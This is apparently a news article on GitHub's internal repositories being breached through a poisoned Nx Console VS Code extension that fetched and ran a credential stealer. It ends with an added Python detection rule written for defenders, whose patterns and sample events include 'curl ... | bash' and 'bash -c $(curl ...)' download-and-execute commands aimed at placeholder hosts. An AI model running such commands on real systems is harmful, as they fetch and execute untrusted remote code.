
GitHub Internal Repositories Breached Through Malicious Nx Console VS Code Extension

GitHub on Wednesday formally confirmed that the breach of its internal repositories was the result of a compromise of an employee machine involving a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension.

The development comes as the Nx team revealed that the extension, nrwl.angular-console, was breached after one of its developers' systems was hacked in the wake of the recent TanStack supply chain attack, which has also impacted OpenAI, Mistral AI, and Grafana Labs.

"We have no evidence of impact to customer data stored outside of GitHub's internal repositories, such as our customers' private enterprises, organizations, and repositories," Alexis Wales, Chief Information Security Officer of GitHub, said in a statement.

"Some of GitHub's internal repositories contain information from customers, for example, excerpts of support interactions. If any impact is discovered, we will notify customers via established incident response and notification channels."

The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to exfiltrate about 3,800 repositories. GitHub said it has taken steps to contain the incident and rotated critical secrets, adding that it is continuing to monitor the situation for follow-on activity.


In a post on X, Jeff Cross, co-founder of Narwhal Technologies, the company behind nx.dev, said, "this incident highlights that there must be deeper, more fundamental changes to how we and other maintainers need to think about securing developer tooling and open source distribution."

"We're also beginning conversations with other high-profile open source maintainers about how we can work together on some of the deeper structural problems around software supply chain security. A lot of the assumptions the ecosystem has operated under for years no longer hold."

In recent months, TeamPCP has rapidly gained notoriety for large-scale software supply chain attacks, specifically going after widely-used open-source projects and security-adjacent tools that developers rely on.

What's notable here is that the trojanized version of the VS Code extension was live on the Visual Studio Marketplace for only eighteen minutes (between 12:30 p.m. and 12:48 p.m. UTC on May 18, 2026). But this short window was enough for the attackers to distribute a credential stealer capable of harvesting sensitive data from 1Password vaults, Anthropic Claude Code configurations, npm, GitHub, and Amazon Web Services (AWS).


"The extension looked and behaved like normal Nx Console, but on startup it silently ran a single shell command that downloaded and executed a hidden package from a planted commit on the official nrwl/nx GitHub repository," OX Security researcher Nir Zadok said. "The command was disguised as a routine MCP setup task so it would not raise suspicion."

The interconnected nature of modern software has allowed TeamPCP to unleash a self-sustaining cycle of new compromises. The pattern that drives this home is as deceptively simple as it is nefarious: break into one trusted tool, steal credentials from the developer systems that install it, and use those credentials to break into the next legitimate tool.

"Every popular extension marketplace ships with auto-update on by default. VS Code, Cursor, the whole lineup," Aikido security researcher Raphael Silva said. "The reasoning makes sense in isolation, because most developers never update anything manually, so leaving it off means a long tail of editors running stale, vulnerable code."
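The behaviour described above, an editor extension that on startup spawns a shell to fetch and run remote content, is one that process-creation telemetry can catch. The following is an added example written for this article, not code from OX Security, GitHub or the Nx project: a small rule that flags a shell whose parent is the editor process and whose command line pipes or substitutes a download straight into an interpreter. The event field names (`ts`, `parent_image`, `image`, `cmdline`), the editor and shell image sets, and the sample events are all constructed assumptions to be mapped onto your own telemetry.

```python
"""
Added example (not from the article, OX Security, GitHub or the Nx project):
flag editor-spawned shells that download and execute remote content in one
step. Field names and sample events are constructed.
"""
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Image basenames treated as "the editor" (assumption: telemetry reports the
# full image path; extend the set for other editors in use).
EDITOR_IMAGES = {"code", "code.exe", "code-insiders", "cursor", "cursor.exe"}
SHELL_IMAGES = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh"}

# Downloader output piped into an interpreter, e.g. `curl ... | bash`.
PIPE_TO_INTERP = re.compile(
    r"\b(curl|wget|iwr|Invoke-WebRequest)\b[^|]*\|\s*(sh|bash|zsh|node|python\d?)\b",
    re.IGNORECASE,
)
# Downloaded text executed via command substitution, e.g. `bash -c "$(curl ...)"`.
SUBST_TO_INTERP = re.compile(
    r"\b(sh|bash|zsh)\b\s+-c\s+.*\$\(\s*(curl|wget)\b",
    re.IGNORECASE,
)


@dataclass
class Alert:
    ts: str
    parent_image: str
    cmdline: str
    reason: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a reason string when the event matches the rule, else None."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("cmdline", "")
    # Scope to shells whose parent is the editor: the same command typed into
    # a terminal has a different parent and is not this rule's concern.
    if parent not in EDITOR_IMAGES or child not in SHELL_IMAGES:
        return None
    if PIPE_TO_INTERP.search(cmd):
        return "editor-spawned shell pipes a download into an interpreter"
    if SUBST_TO_INTERP.search(cmd):
        return "editor-spawned shell runs downloaded text via command substitution"
    return None


def scan(lines: Iterable[str]) -> List[Alert]:
    """Run classify() over JSON-lines process-creation events."""
    alerts: List[Alert] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        reason = classify(ev)
        if reason:
            alerts.append(Alert(ev["ts"], ev["parent_image"], ev["cmdline"], reason))
    return alerts


# Constructed sample events: a pipe-to-shell from the editor, a benign git
# command from the editor, the same pipe-to-shell from a terminal (wrong
# parent, so ignored here), and a command-substitution case from the editor.
SAMPLE_EVENTS = r"""
{"ts":"2026-05-18T12:31:02Z","parent_image":"/usr/share/code/code","image":"/bin/sh","cmdline":"sh -c \"curl -fsSL https://example.invalid/mcp-setup | bash\""}
{"ts":"2026-05-18T12:31:05Z","parent_image":"/usr/share/code/code","image":"/bin/sh","cmdline":"sh -c \"git status --porcelain\""}
{"ts":"2026-05-18T12:31:09Z","parent_image":"/usr/bin/bash","image":"/bin/sh","cmdline":"sh -c \"curl -fsSL https://example.invalid/x | bash\""}
{"ts":"2026-05-18T12:32:00Z","parent_image":"/usr/share/code/code","image":"/bin/bash","cmdline":"bash -c \"$(curl -s https://example.invalid/setup.sh)\""}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{a.ts} {a.reason}: {a.cmdline}")
```

The rule deliberately keys on the parent process rather than on the URL: a disguised "MCP setup" step can point anywhere, but an extension host has little legitimate reason to hand curl output to a shell during startup, so the parent-child pairing is the stable signal. Run against the constructed events, the first and fourth lines alert and the terminal-spawned copy of the same command does not.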


"The trade-off stops making sense once you account for hostile or compromised publishers. Auto-update gives an attacker who controls a release a direct push channel into every machine running that extension. Marketplaces don't impose any review gate or waiting period between when an update is published and when installed clients pull it in."
